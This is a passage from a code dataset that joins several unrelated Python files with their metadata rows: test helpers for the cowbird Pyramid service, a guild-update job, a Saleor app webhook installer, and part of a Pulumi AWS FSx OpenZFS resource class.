def user_deleted(self, user_name):
self.event_users.remove(user_name)
def permission_created(self, permission):
self.event_perms.append(permission.resource_full_name)
def permission_deleted(self, permission):
self.event_perms.remove(permission.resource_full_name)
def create_permission(self, permission):
self.outbound_perms.append(permission)
def delete_permission(self, permission):
for perm in self.outbound_perms:
if perm == permission:
self.outbound_perms.remove(perm)
return
class MockAnyServiceBase(Service):
ResourceId = 1000
def get_resource_id(self, resource_full_name):
# type (str) -> str
return MockAnyService.ResourceId
def user_created(self, user_name):
pass
def user_deleted(self, user_name):
pass
def permission_created(self, permission):
pass
def permission_deleted(self, permission):
pass
class MockAnyService(MockAnyServiceBase):
required_params = []
def clear_services_instances():
# Remove the service instances initialized with test specific config
SingletonMeta._instances.clear() # pylint: disable=W0212
def config_setup_from_ini(config_ini_file_path):
settings = get_settings_from_config_ini(config_ini_file_path)
config = PyramidSetUp(settings=settings)
return config
def get_test_app(settings=None):
# type: (Optional[SettingsType]) -> TestApp
"""
Instantiate a local test application.
"""
config = config_setup_from_ini(TEST_INI_FILE)
config.registry.settings["cowbird.url"] = "http://localhost:80"
config.registry.settings["cowbird.ini_file_path"] = TEST_INI_FILE
config.registry.settings["cowbird.config_path"] = TEST_CFG_FILE
config.registry.settings["mongo_uri"] = "mongodb://{host}:{port}/{db_name}".format(
host=os.getenv("COWBIRD_TEST_DB_HOST", "127.0.0.1"),
port=os.getenv("COWBIRD_TEST_DB_PORT", "27017"),
db_name=os.getenv("COWBIRD_TEST_DB_NAME", "cowbird-test")
)
# For test, we want to use the real Celery app which is properly mocked
# By setting the internal setting USE_TEST_CELERY_APP_CFG to true, the pyramid celery app will not be used
config.registry.settings[USE_TEST_CELERY_APP_CFG] = True
if settings:
config.registry.settings.update(settings)
test_app = TestApp(get_app({}, **config.registry.settings))
return test_app
def get_app_or_url(test_item):
# type: (AnyTestItemType) -> TestAppOrUrlType
"""
Obtains the referenced test application, local application or remote URL from `Test Case` implementation.
"""
if isinstance(test_item, (TestApp, str)):
return test_item
test_app = getattr(test_item, "test_app", None)
if test_app and isinstance(test_app, TestApp):
return test_app
app_or_url = getattr(test_item, "app", None) or getattr(test_item, "url", None)
if not app_or_url:
raise ValueError("Invalid test class, application or URL could not be found.")
return app_or_url
def get_hostname(test_item):
# type: (AnyTestItemType) -> str
"""
Obtains stored hostname in the class implementation.
"""
app_or_url = get_app_or_url(test_item)
if isinstance(app_or_url, TestApp):
app_or_url = get_constant("COWBIRD_URL", app_or_url.app.registry)
return urlparse(app_or_url).hostname
def get_headers(app_or_url, header_dict):
# type: (TestAppOrUrlType, AnyHeadersType) -> HeadersType
"""
Obtains stored headers in the class implementation.
"""
if isinstance(app_or_url, TestApp):
return dict(header_dict.items()) # noqa
return header_dict
def get_response_content_types_list(response):
# type: (AnyResponseType) -> List[str]
"""
Obtains the specified response Content-Type header(s) without additional formatting parameters.
"""
content_types = []
known_types = ["application", "audio", "font", "example", "image", "message", "model", "multipart", "text", "video"]
for part in response.headers["Content-Type"].split(";"):
for sub_type in part.strip().split(","):
if "=" not in sub_type and sub_type.split("/")[0] in known_types:
content_types.append(sub_type)
return content_types
def get_json_body(response):
# type: (AnyResponseType) -> JSON
"""
Obtains the JSON payload of the response regardless of its class implementation.
"""
if isinstance(response, TestResponse):
return response.json
return response.json()
def json_msg(json_body, msg=null):
# type: (JSON, Optional[str]) -> str
"""
Generates a message string with formatted JSON body for display with easier readability.
"""
json_str = json_pkg.dumps(json_body, indent=4, ensure_ascii=False)
if msg is not null:
return "{}\n{}".format(msg, json_str)
return json_str
def mock_get_settings(test):
"""
Decorator to mock :func:`cowbird.utils.get_settings` to allow retrieval of settings from :class:`DummyRequest`.
.. warning::
Only apply on test methods (not on class TestCase) to ensure that :mod:`pytest` can collect them correctly.
"""
from cowbird.utils import get_settings as real_get_settings
def mocked(container):
if isinstance(container, DummyRequest):
return container.registry.settings
return real_get_settings(container)
@functools.wraps(test)
def wrapped(*_, **__):
# mock.patch("cowbird.services.get_settings", side_effect=mocked)
with mock.patch("cowbird.utils.get_settings", side_effect=mocked):
return test(*_, **__)
return wrapped
def mock_request(request_path_query="", # type: str
method="GET", # type: str
params=None, # type: Optional[Dict[str, str]]
body="", # type: Union[str, JSON]
content_type=None, # type: Optional[str]
headers=None, # type: Optional[AnyHeadersType]
cookies=None, # type: Optional[AnyCookiesType]
settings=None, # type: SettingsType
): # type: (...) -> Request
"""
Generates a fake request with provided arguments.
Can be employed by functions that expect a request object as input to retrieve details such as body content, the
request path, or internal settings, but that no actual request needs to be accomplished.
"""
parts = request_path_query.split("?")
path = parts[0]
query = dict()
if len(parts) > 1 and parts[1]:
for part in parts[1].split("&"):
kv = part.split("=") # handle trailing keyword query arguments without values
if kv[0]: # handle invalid keyword missing
query[kv[0]] = kv[1] if len(kv) > 1 else None
elif params:
query = params
request = DummyRequest(path=path, params=query)
request.path_qs = request_path_query
request.method = method
request.content_type = content_type
request.headers = headers or {}
request.cookies = cookies or {}
request.matched_route = None # cornice method
if content_type:
request.headers["Content-Type"] = content_type
request.body = body
try:
if body:
# set missing DummyRequest.json attribute
request.json = json_pkg.loads(body) # type: ignore
except (TypeError, ValueError):
pass
request.registry.settings = settings or {}
return request # noqa # fake type of what is normally expected just to avoid many 'noqa'
def test_request(test_item, # type: AnyTestItemType
method, # type: str
path, # type: str
data=None, # type: Optional[Union[JSON, str]]
json=None, # type: Optional[Union[JSON, str]]
body=None, # type: Optional[Union[JSON, str]]
params=None, # type: Optional[Dict[str, str]]
timeout=10, # type: int
retries=3, # type: int
allow_redirects=True, # type: bool
content_type=None, # type: Optional[str]
headers=None, # type: Optional[HeadersType]
cookies=None, # type: Optional[CookiesType]
**kwargs # type: Any
): # type: (...) -> AnyResponseType
"""
Calls the request using either a :class:`webtest.TestApp` instance or :class:`requests.Request` from a string URL.
Keyword arguments :paramref:`json`, :paramref:`data` and :paramref:`body` are all looked for to obtain the data.
Header ``Content-Type`` is set with respect to explicit :paramref:`json` or via provided :paramref:`headers` when
available. Explicit :paramref:`content_type` can also be provided to override all of these.
Request cookies are set according to :paramref:`cookies`, or can be interpreted from ``Set-Cookie`` header.
.. warning::
When using :class:`TestApp`, some internal cookies can be stored from previous requests to retain the active
user. Make sure to provide new set of cookies (or logout user explicitly) if different session must be used,
otherwise they will be picked up automatically. For 'empty' cookies, provide an empty dictionary.
:param test_item: one of `BaseTestCase`, `webtest.TestApp` or remote server URL to call with `requests`
:param method: request method (GET, POST, PATCH, PUT, DELETE)
:param path: test path starting at base path that will be appended to the application's endpoint.
:param params: query parameters added to the request path.
:param json: explicit JSON body content to use as request body.
:param data: body content string to use as request body, can be JSON if matching ``Content-Type`` is identified.
:param body: alias to :paramref:`data`.
:param content_type:
Enforce specific content-type of provided data body. Otherwise, attempt to retrieve it from request headers.
Inferred JSON content-type when :paramref:`json` is employed, unless overridden explicitly.
:param headers: Set of headers to send the request. Header ``Content-Type`` is looked for if not overridden.
:param cookies: Cookies to provide to the request.
:param timeout: passed down to :mod:`requests` when using URL, otherwise ignored (unsupported).
:param retries: number of retry attempts in case the requested failed due to timeout (only when using URL).
:param allow_redirects:
Passed down to :mod:`requests` when using URL, handled manually for same behaviour when using :class:`TestApp`.
:param kwargs: any additional keywords that will be forwarded to the request call.
:return: response of the request
"""
method = method.upper()
status = kwargs.pop("status", None)
# obtain json body from any json/data/body kw and empty {} if not specified
# reapply with the expected webtest/requests method kw afterward
_body = json or data or body or {}
app_or_url = get_app_or_url(test_item)
if isinstance(app_or_url, TestApp):
# set 'cookies' handled by the 'TestApp' instance if not present or different
if cookies is not None:
cookies = dict(cookies) # convert tuple-list as needed
if not app_or_url.cookies or app_or_url.cookies != cookies:
app_or_url.cookies.update(cookies)
# obtain Content-Type header if specified to ensure it is properly applied
kwargs["content_type"] = content_type if content_type else get_header("Content-Type", headers)
# update path with query parameters since TestApp does not have an explicit argument when not using GET
if params:
path += "?" + "&".join("{!s}={!s}".format(k, v) for k, v in params.items() if v is not None)
kwargs.update({
"params": _body, # TestApp uses 'params' for the body during POST (these are not the query parameters)
"headers": dict(headers or {}), # adjust if none provided or specified as tuple list
})
# convert JSON body as required
if _body is not None and (json is not None or kwargs["content_type"] == CONTENT_TYPE_JSON):
kwargs["params"] = json_pkg.dumps(_body, cls=json_pkg.JSONEncoder)
kwargs["content_type"] = CONTENT_TYPE_JSON # enforce if only 'json' keyword provided
kwargs["headers"]["Content-Length"] = str(len(kwargs["params"])) # need to fix with override JSON payload
if status and status >= 300:
kwargs["expect_errors"] = True
err_code = None
err_msg = None
try:
resp = app_or_url._gen_request(method, path, **kwargs) # pylint: disable=W0212 # noqa: W0212
except AppError as exc:
err_code = exc
err_msg = str(exc)
except HTTPException as exc:
err_code = exc.status_code
err_msg = str(exc) + str(getattr(exc, "exception", ""))
except Exception as exc:
err_code = 500
err_msg = "Unknown: {!s}".format(exc)
finally:
if err_code:
info = json_msg({"path": path, "method": method, "body": _body, "headers": kwargs["headers"]})
result = "Request raised unexpected error: {!s}\nError: {}\nRequest:\n{}"
raise AssertionError(result.format(err_code, err_msg, info))
# automatically follow the redirect if any and evaluate its response
max_redirect = kwargs.get("max_redirects", 5)
while 300 <= resp.status_code < 400 and max_redirect > 0: # noqa
resp = resp.follow()
max_redirect -= 1
assert max_redirect >= 0, "Maximum follow redirects reached."
# test status accordingly if specified
assert resp.status_code == status or status is None, "Response not matching the expected status code."
return resp
kwargs.pop("expect_errors", None) # remove keyword specific to TestApp
content_type = get_header("Content-Type", headers)
if json or content_type == CONTENT_TYPE_JSON:
kwargs["json"] = _body
elif data or body:
kwargs["data"] = _body
url = "{url}{path}".format(url=app_or_url, path=path)
while True:
try:
return requests.request(method, url, params=params, headers=headers, cookies=cookies,
timeout=timeout, allow_redirects=allow_redirects, **kwargs)
except requests.exceptions.ReadTimeout:
if retries <= 0:
raise
retries -= 1
def visual_repr(item):
# type: (Any) -> str
try:
if isinstance(item, (dict, list)):
return json_pkg.dumps(item, indent=4, ensure_ascii=False)
except Exception: # noqa
pass
return "'{}'".format(repr(item))
def format_test_val_ref(val, ref, pre="Fail", msg=None):
if is_null(msg):
_msg = "({}) Failed condition between test and reference values.".format(pre)
else:
_msg = "({}) Test value: {}, Reference value: {}".format(pre, visual_repr(val), visual_repr(ref))
if isinstance(msg, str):
_msg = "{}\n{}".format(msg, _msg)
return _msg
def all_equal(iter_val, iter_ref, any_order=False):
if not (hasattr(iter_val, "__iter__") and hasattr(iter_ref, "__iter__")):
return False
if len(iter_val) != len(iter_ref):
return False
if any_order:
return all(it in iter_ref for it in iter_val)
return all(it == ir for it, ir in zip(iter_val, iter_ref))
def check_all_equal(iter_val, iter_ref, msg=None, any_order=False):
# type: (Collection[Any], Union[Collection[Any], NullType], Optional[str], bool) -> None
"""
:param iter_val: tested values.
:param iter_ref: reference values.
:param msg: override message to display if failing test.
:param any_order: allow equal values to be provided in any order, otherwise order must match as well as values.
:raises AssertionError:
If all values in :paramref:`iter_val` are not equal to values within :paramref:`iter_ref`.
If :paramref:`any_order` is ``False``, also raises if equal items are not in the same order.
"""
r_val = repr(iter_val)
r_ref = repr(iter_ref)
assert all_equal(iter_val, iter_ref, any_order), format_test_val_ref(r_val, r_ref, pre="All Equal Fail", msg=msg)
def check_val_equal(val, ref, msg=None):
# type: (Any, Union[Any, NullType], Optional[str]) -> None
""":raises AssertionError: if :paramref:`val` is not equal to :paramref:`ref`."""
assert is_null(ref) or val == ref, format_test_val_ref(val, ref, pre="Equal Fail", msg=msg)
def check_val_not_equal(val, ref, msg=None):
# type: (Any, Union[Any, NullType], Optional[str]) -> None
""":raises AssertionError: if :paramref:`val` is equal to :paramref:`ref`."""
assert is_null(ref) or val != ref, format_test_val_ref(val, ref, pre="Not Equal Fail", msg=msg)
def check_val_is_in(val, ref, msg=None):
# type: (Any, Union[Any, NullType], Optional[str]) -> None
""":raises AssertionError: if :paramref:`val` is not in to :paramref:`ref`."""
assert is_null(ref) or val in ref, format_test_val_ref(val, ref, pre="Is In Fail", msg=msg)
def check_val_not_in(val, ref, msg=None):
# type: (Any, Union[Any, NullType], Optional[str]) -> None
""":raises AssertionError: if :paramref:`val` is in to :paramref:`ref`."""
assert is_null(ref) or val not in ref, format_test_val_ref(val, ref, pre="Not In Fail", msg=msg)
def check_val_type(val, ref, msg=None):
# type: (Any, Union[Type[Any], NullType, Iterable[Type[Any]]], Optional[str]) -> None
""":raises AssertionError: if :paramref:`val` is not an instanced of :paramref:`ref`."""
assert isinstance(val, ref), format_test_val_ref(val, repr(ref), pre="Type Fail", msg=msg)
def check_raises(func, exception_type, msg=None):
# type: (Callable[[], Any], Type[Exception], Optional[str]) -> Exception
"""
Calls the callable and verifies that the specific exception was raised.
:raise AssertionError: on failing exception check or missing raised exception.
:returns: raised exception of expected type if it was raised.
"""
msg = ": {}".format(msg) if msg else "."
try:
func()
except Exception as exc: # pylint: disable=W0703
msg = "Wrong exception [{!s}] raised instead of [{!s}]{}" \
.format(type(exc).__name__, exception_type.__name__, msg)
assert isinstance(exc, exception_type), msg
return exc
raise AssertionError("Exception [{!s}] was not raised{}".format(exception_type.__name__, msg))
def check_no_raise(func, msg=None):
# type: (Callable[[], Any], Optional[str]) -> Any
"""
Calls the callable and verifies that no exception was raised.
:raise AssertionError: on any raised exception.
"""
try:
return func()
except Exception as exc: # pylint: disable=W0703
msg = ": {}".format(msg) if msg else "."
raise AssertionError("Exception [{!r}] was raised when none is expected{}".format(type(exc).__name__, msg))
def check_response_basic_info(response, # type: AnyResponseType
expected_code=200, # type: int
expected_type=CONTENT_TYPE_JSON, # type: str
expected_method="GET", # type: str
extra_message=None, # type: Optional[str]
): # type: (...) -> Union[JSON, str]
"""
Validates basic `Cowbird` API response metadata. For UI pages, employ :func:`check_ui_response_basic_info` instead.
If the expected content-type is JSON, further validations are accomplished with specific metadata fields that are
always expected in the response body. Otherwise, minimal validation of basic fields that can be validated regardless
of content-type is done.
:param response: response to validate.
:param expected_code: status code to validate from the response.
:param expected_type: Content-Type to validate from the response.
:param expected_method: method 'GET', 'POST', etc. to validate from the response if an error.
:param extra_message: additional message to append to every specific test message if provided.
:return: json body of the response for convenience.
"""
def _(_msg):
return _msg + " " + extra_message if extra_message else _msg
check_val_is_in("Content-Type", dict(response.headers), msg=_("Response doesn't define 'Content-Type' header."))
content_types = get_response_content_types_list(response)
check_val_is_in(expected_type, content_types, msg=_("Response doesn't match expected HTTP Content-Type header."))
code_message = "Response doesn't match expected HTTP status code."
if expected_type == CONTENT_TYPE_JSON:
# provide more details about mismatching code since to help debug cause of error
code_message += "\nReason:\n{}".format(json_msg(get_json_body(response)))
check_val_equal(response.status_code, expected_code, msg=_(code_message))
if expected_type == CONTENT_TYPE_JSON:
body = get_json_body(response)
check_val_is_in("code", body, msg=_("Parameter 'code' should be in response JSON body."))
check_val_is_in("type", body, msg=_("Parameter 'type' should be in response JSON body."))
check_val_is_in("detail", body, msg=_("Parameter 'detail' should be in response JSON body."))
check_val_equal(body["code"], expected_code, msg=_("Parameter 'code' should match HTTP status code."))
check_val_equal(body["type"], expected_type, msg=_("Parameter 'type' should match HTTP Content-Type header."))
check_val_not_equal(body["detail"], "", msg=_("Parameter 'detail' should not be empty."))
else:
body = response.text
if response.status_code >= 400:
# error details available for any content-type, just in different format
check_val_is_in("url", body, msg=_("Request URL missing from contents,"))
check_val_is_in("path", body, msg=_("Request path missing from contents."))
check_val_is_in("method", body, msg=_("Request method missing from contents."))
if expected_type == CONTENT_TYPE_JSON: # explicitly check by dict-key if JSON
check_val_equal(body["method"], expected_method, msg=_("Request method not matching expected value."))
return body
def check_error_param_structure(body, # type: JSON
param_value=null, # type: Optional[Any]
param_name=null, # type: Optional[str]
param_compare=null, # type: Optional[Any]
is_param_value_literal_unicode=False, # type: bool
param_name_exists=False, # type: bool
param_compare_exists=False, # type: bool
): # type: (...) -> None
"""
Validates error response ``param`` information based on different Cowbird version formats.
:param body: JSON body of the response to validate.
:param param_value:
Expected 'value' of param the parameter.
Contained field value not verified if ``null``, only presence of the field.
:param param_name:
Expected 'name' of param. Ignored for older Cowbird version that did not provide this information.
Contained field value not verified if ``null`` and ``param_name_exists`` is ``True`` (only its presence).
If provided, automatically implies ``param_name_exists=True``. Skipped otherwise.
:param param_compare:
Expected 'compare'/'param_compare' value (filed name according to version)
Contained field value not verified if ``null`` and ``param_compare_exists`` is ``True`` (only its presence).
If provided, automatically implies ``param_compare_exists=True``. Skipped otherwise.
:param is_param_value_literal_unicode: param value is represented as `u'{paramValue}'` for older Cowbird version.
:param param_name_exists: verify that 'name' is in the body, not validating its value.
:param param_compare_exists: verify that 'compare'/'param_compare' is in the body, not validating its value.
:raises AssertionError: on any failing condition
"""
check_val_type(body, dict)
check_val_is_in("param", body)
check_val_type(body["param"], dict)
check_val_is_in("value", body["param"])
if param_name_exists or param_name is not null:
check_val_is_in("name", body["param"])
if param_name is not null:
check_val_equal(body["param"]["name"], param_name)
if param_value is not null:
check_val_equal(body["param"]["value"], param_value)
if param_compare_exists or param_compare is not null:
check_val_is_in("compare", body["param"])
if param_compare is not null:
check_val_equal(body["param"]["compare"], param_compare)
| 44.042105
| 120
| 0.651974
| 2,992
| 0.102158
| 0
| 0
| 232
| 0.007921
| 0
| 0
| 13,281
| 0.453462
|
8bc1dc764cc3286fa9cb0c9dbac2a3360dc97788
| 764
|
py
|
Python
|
sqds/jobs/update_guilds.py
|
abey79/sqds
|
acab1d9c6d4a010fff9d8e89a5fdd9d94def7c89
|
[
"MIT"
] | null | null | null |
sqds/jobs/update_guilds.py
|
abey79/sqds
|
acab1d9c6d4a010fff9d8e89a5fdd9d94def7c89
|
[
"MIT"
] | null | null | null |
sqds/jobs/update_guilds.py
|
abey79/sqds
|
acab1d9c6d4a010fff9d8e89a5fdd9d94def7c89
|
[
"MIT"
] | null | null | null |
from django.utils import timezone
from django_extensions.management.jobs import BaseJob
from ..models import Player, Guild
def update_guild(ally_code):
should_execute = False
try:
player = Player.objects.get(ally_code=ally_code)
guild = player.guild;
since_last_update = timezone.now() - guild.last_updated
if since_last_update.total_seconds() >= 4 * 3600:
should_execute = True
except Player.DoesNotExist:
should_execute = True
if should_execute:
Guild.objects.update_or_create_from_swgoh(ally_code=ally_code)
class Job(BaseJob):
help = "Update PREPARE and PREPAIRED data from swgoh.help"
def execute(self):
update_guild(116235559)
update_guild(343174317)
| 27.285714
| 70
| 0.704188
| 170
| 0.222513
| 0
| 0
| 0
| 0
| 0
| 0
| 51
| 0.066754
|
8bc3ea498abafb408b2345871e2adf30ac6a71a4
| 1,907
|
py
|
Python
|
src/saleor_app/install.py
|
przlada/saleor-app-framework-python
|
3a561c93bf586b4210e7b3c4d2db3408046a9599
|
[
"BSD-3-Clause"
] | 20
|
2021-05-18T18:05:25.000Z
|
2022-03-02T00:39:15.000Z
|
src/saleor_app/install.py
|
przlada/saleor-app-framework-python
|
3a561c93bf586b4210e7b3c4d2db3408046a9599
|
[
"BSD-3-Clause"
] | 13
|
2021-10-19T19:05:24.000Z
|
2022-03-22T13:17:55.000Z
|
src/saleor_app/install.py
|
przlada/saleor-app-framework-python
|
3a561c93bf586b4210e7b3c4d2db3408046a9599
|
[
"BSD-3-Clause"
] | 11
|
2021-06-09T21:24:56.000Z
|
2022-03-12T17:33:30.000Z
|
import logging
import secrets
import string
from typing import Awaitable, Callable, List
from saleor_app.conf import get_settings
from saleor_app.errors import InstallAppError
from saleor_app.graphql import GraphQLError, get_executor, get_saleor_api_url
from saleor_app.mutations import CREATE_WEBHOOK
from saleor_app.schemas.core import AppToken, DomainName, Url, WebhookData
logger = logging.getLogger(__name__)
async def install_app(
domain: DomainName,
token: AppToken,
events: List[str],
target_url: Url,
save_app_data: Callable[[DomainName, WebhookData], Awaitable],
):
alphabet = string.ascii_letters + string.digits
secret_key = "".join(secrets.choice(alphabet) for _ in range(20))
api_url = get_saleor_api_url(domain)
executor = get_executor(host=api_url, auth_token=token)
settings = get_settings()
response, errors = await executor(
CREATE_WEBHOOK,
variables={
"input": {
"targetUrl": target_url,
"events": [event.upper() for event in events],
"name": settings.app_name,
"secretKey": secret_key,
}
},
)
if errors:
logger.warning("Webhook create mutation raised an error")
raise GraphQLError("Webhook create mutation raised an error")
webhook_error = response["data"]["webhookCreate"].get("errors")
if webhook_error:
logger.warning(
"Unable to finish installation of app for %s. Received error: %s",
domain,
webhook_error,
)
raise InstallAppError("Failed to create webhook for %s.", domain)
saleor_webhook_id = response["data"]["webhookCreate"]["webhook"]["id"]
install_app_data = WebhookData(
token=token, webhook_id=saleor_webhook_id, webhook_secret_key=secret_key
)
await save_app_data(domain, install_app_data)
| 31.783333
| 80
| 0.678553
| 0
| 0
| 0
| 0
| 0
| 0
| 1,488
| 0.780283
| 289
| 0.151547
|
8bc41c33e45aca9a963dba5e594b74e5dcb92d03
| 64,465
|
py
|
Python
|
sdk/python/pulumi_aws/fsx/open_zfs_file_system.py
|
chivandikwa/pulumi-aws
|
19c08bf9dcb90544450ffa4eec7bf6751058fde2
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_aws/fsx/open_zfs_file_system.py
|
chivandikwa/pulumi-aws
|
19c08bf9dcb90544450ffa4eec7bf6751058fde2
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_aws/fsx/open_zfs_file_system.py
|
chivandikwa/pulumi-aws
|
19c08bf9dcb90544450ffa4eec7bf6751058fde2
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._inputs import *
__all__ = ['OpenZfsFileSystemArgs', 'OpenZfsFileSystem']
@pulumi.input_type
class OpenZfsFileSystemArgs:
def __init__(__self__, *,
deployment_type: pulumi.Input[str],
subnet_ids: pulumi.Input[str],
throughput_capacity: pulumi.Input[int],
automatic_backup_retention_days: Optional[pulumi.Input[int]] = None,
backup_id: Optional[pulumi.Input[str]] = None,
copy_tags_to_backups: Optional[pulumi.Input[bool]] = None,
copy_tags_to_volumes: Optional[pulumi.Input[bool]] = None,
daily_automatic_backup_start_time: Optional[pulumi.Input[str]] = None,
disk_iops_configuration: Optional[pulumi.Input['OpenZfsFileSystemDiskIopsConfigurationArgs']] = None,
kms_key_id: Optional[pulumi.Input[str]] = None,
root_volume_configuration: Optional[pulumi.Input['OpenZfsFileSystemRootVolumeConfigurationArgs']] = None,
security_group_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
storage_capacity: Optional[pulumi.Input[int]] = None,
storage_type: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
tags_all: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
weekly_maintenance_start_time: Optional[pulumi.Input[str]] = None):
"""
The set of arguments for constructing a OpenZfsFileSystem resource.
:param pulumi.Input[str] deployment_type: - The filesystem deployment type. Only `SINGLE_AZ_1` is supported.
:param pulumi.Input[str] subnet_ids: A list of IDs for the subnets that the file system will be accessible from. Exactly 1 subnet need to be provided.
:param pulumi.Input[int] throughput_capacity: Throughput (megabytes per second) of the file system in power of 2 increments. Minimum of `64` and maximum of `4096`.
:param pulumi.Input[int] automatic_backup_retention_days: The number of days to retain automatic backups. Setting this to 0 disables automatic backups. You can retain automatic backups for a maximum of 90 days.
:param pulumi.Input[str] backup_id: The ID of the source backup to create the filesystem from.
:param pulumi.Input[bool] copy_tags_to_backups: A boolean flag indicating whether tags for the file system should be copied to backups. The default value is false.
:param pulumi.Input[bool] copy_tags_to_volumes: A boolean flag indicating whether tags for the file system should be copied to snapshots. The default value is false.
:param pulumi.Input[str] daily_automatic_backup_start_time: A recurring daily time, in the format HH:MM. HH is the zero-padded hour of the day (0-23), and MM is the zero-padded minute of the hour. For example, 05:00 specifies 5 AM daily. Requires `automatic_backup_retention_days` to be set.
:param pulumi.Input['OpenZfsFileSystemDiskIopsConfigurationArgs'] disk_iops_configuration: The SSD IOPS configuration for the Amazon FSx for OpenZFS file system. See Disk Iops Configuration Below.
:param pulumi.Input[str] kms_key_id: ARN for the KMS Key to encrypt the file system at rest, Defaults to an AWS managed KMS Key.
:param pulumi.Input['OpenZfsFileSystemRootVolumeConfigurationArgs'] root_volume_configuration: The configuration for the root volume of the file system. All other volumes are children or the root volume. See Root Volume Configuration Below.
:param pulumi.Input[Sequence[pulumi.Input[str]]] security_group_ids: A list of IDs for the security groups that apply to the specified network interfaces created for file system access. These security groups will apply to all network interfaces.
:param pulumi.Input[int] storage_capacity: The storage capacity (GiB) of the file system. Valid values between `64` and `524288`.
:param pulumi.Input[str] storage_type: The filesystem storage type. Only `SSD` is supported.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A map of tags to assign to the file system. If configured with a provider [`default_tags` configuration block](https://www.terraform.io/docs/providers/aws/index.html#default_tags-configuration-block) present, tags with matching keys will overwrite those defined at the provider-level.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags_all: A map of tags assigned to the resource, including those inherited from the provider [`default_tags` configuration block](https://www.terraform.io/docs/providers/aws/index.html#default_tags-configuration-block).
:param pulumi.Input[str] weekly_maintenance_start_time: The preferred start time (in `d:HH:MM` format) to perform weekly maintenance, in the UTC time zone.
"""
pulumi.set(__self__, "deployment_type", deployment_type)
pulumi.set(__self__, "subnet_ids", subnet_ids)
pulumi.set(__self__, "throughput_capacity", throughput_capacity)
if automatic_backup_retention_days is not None:
pulumi.set(__self__, "automatic_backup_retention_days", automatic_backup_retention_days)
if backup_id is not None:
pulumi.set(__self__, "backup_id", backup_id)
if copy_tags_to_backups is not None:
pulumi.set(__self__, "copy_tags_to_backups", copy_tags_to_backups)
if copy_tags_to_volumes is not None:
pulumi.set(__self__, "copy_tags_to_volumes", copy_tags_to_volumes)
if daily_automatic_backup_start_time is not None:
pulumi.set(__self__, "daily_automatic_backup_start_time", daily_automatic_backup_start_time)
if disk_iops_configuration is not None:
pulumi.set(__self__, "disk_iops_configuration", disk_iops_configuration)
if kms_key_id is not None:
pulumi.set(__self__, "kms_key_id", kms_key_id)
if root_volume_configuration is not None:
pulumi.set(__self__, "root_volume_configuration", root_volume_configuration)
if security_group_ids is not None:
pulumi.set(__self__, "security_group_ids", security_group_ids)
if storage_capacity is not None:
pulumi.set(__self__, "storage_capacity", storage_capacity)
if storage_type is not None:
pulumi.set(__self__, "storage_type", storage_type)
if tags is not None:
pulumi.set(__self__, "tags", tags)
if tags_all is not None:
pulumi.set(__self__, "tags_all", tags_all)
if weekly_maintenance_start_time is not None:
pulumi.set(__self__, "weekly_maintenance_start_time", weekly_maintenance_start_time)
@property
@pulumi.getter(name="deploymentType")
def deployment_type(self) -> pulumi.Input[str]:
"""
- The filesystem deployment type. Only `SINGLE_AZ_1` is supported.
"""
return pulumi.get(self, "deployment_type")
@deployment_type.setter
def deployment_type(self, value: pulumi.Input[str]):
pulumi.set(self, "deployment_type", value)
@property
@pulumi.getter(name="subnetIds")
def subnet_ids(self) -> pulumi.Input[str]:
"""
A list of IDs for the subnets that the file system will be accessible from. Exactly 1 subnet need to be provided.
"""
return pulumi.get(self, "subnet_ids")
@subnet_ids.setter
def subnet_ids(self, value: pulumi.Input[str]):
pulumi.set(self, "subnet_ids", value)
@property
@pulumi.getter(name="throughputCapacity")
def throughput_capacity(self) -> pulumi.Input[int]:
"""
Throughput (megabytes per second) of the file system in power of 2 increments. Minimum of `64` and maximum of `4096`.
"""
return pulumi.get(self, "throughput_capacity")
@throughput_capacity.setter
def throughput_capacity(self, value: pulumi.Input[int]):
pulumi.set(self, "throughput_capacity", value)
@property
@pulumi.getter(name="automaticBackupRetentionDays")
def automatic_backup_retention_days(self) -> Optional[pulumi.Input[int]]:
"""
The number of days to retain automatic backups. Setting this to 0 disables automatic backups. You can retain automatic backups for a maximum of 90 days.
"""
return pulumi.get(self, "automatic_backup_retention_days")
@automatic_backup_retention_days.setter
def automatic_backup_retention_days(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "automatic_backup_retention_days", value)
@property
@pulumi.getter(name="backupId")
def backup_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the source backup to create the filesystem from.
"""
return pulumi.get(self, "backup_id")
@backup_id.setter
def backup_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "backup_id", value)
@property
@pulumi.getter(name="copyTagsToBackups")
def copy_tags_to_backups(self) -> Optional[pulumi.Input[bool]]:
"""
A boolean flag indicating whether tags for the file system should be copied to backups. The default value is false.
"""
return pulumi.get(self, "copy_tags_to_backups")
@copy_tags_to_backups.setter
def copy_tags_to_backups(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "copy_tags_to_backups", value)
@property
@pulumi.getter(name="copyTagsToVolumes")
def copy_tags_to_volumes(self) -> Optional[pulumi.Input[bool]]:
"""
A boolean flag indicating whether tags for the file system should be copied to snapshots. The default value is false.
"""
return pulumi.get(self, "copy_tags_to_volumes")
@copy_tags_to_volumes.setter
def copy_tags_to_volumes(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "copy_tags_to_volumes", value)
@property
@pulumi.getter(name="dailyAutomaticBackupStartTime")
def daily_automatic_backup_start_time(self) -> Optional[pulumi.Input[str]]:
"""
A recurring daily time, in the format HH:MM. HH is the zero-padded hour of the day (0-23), and MM is the zero-padded minute of the hour. For example, 05:00 specifies 5 AM daily. Requires `automatic_backup_retention_days` to be set.
"""
return pulumi.get(self, "daily_automatic_backup_start_time")
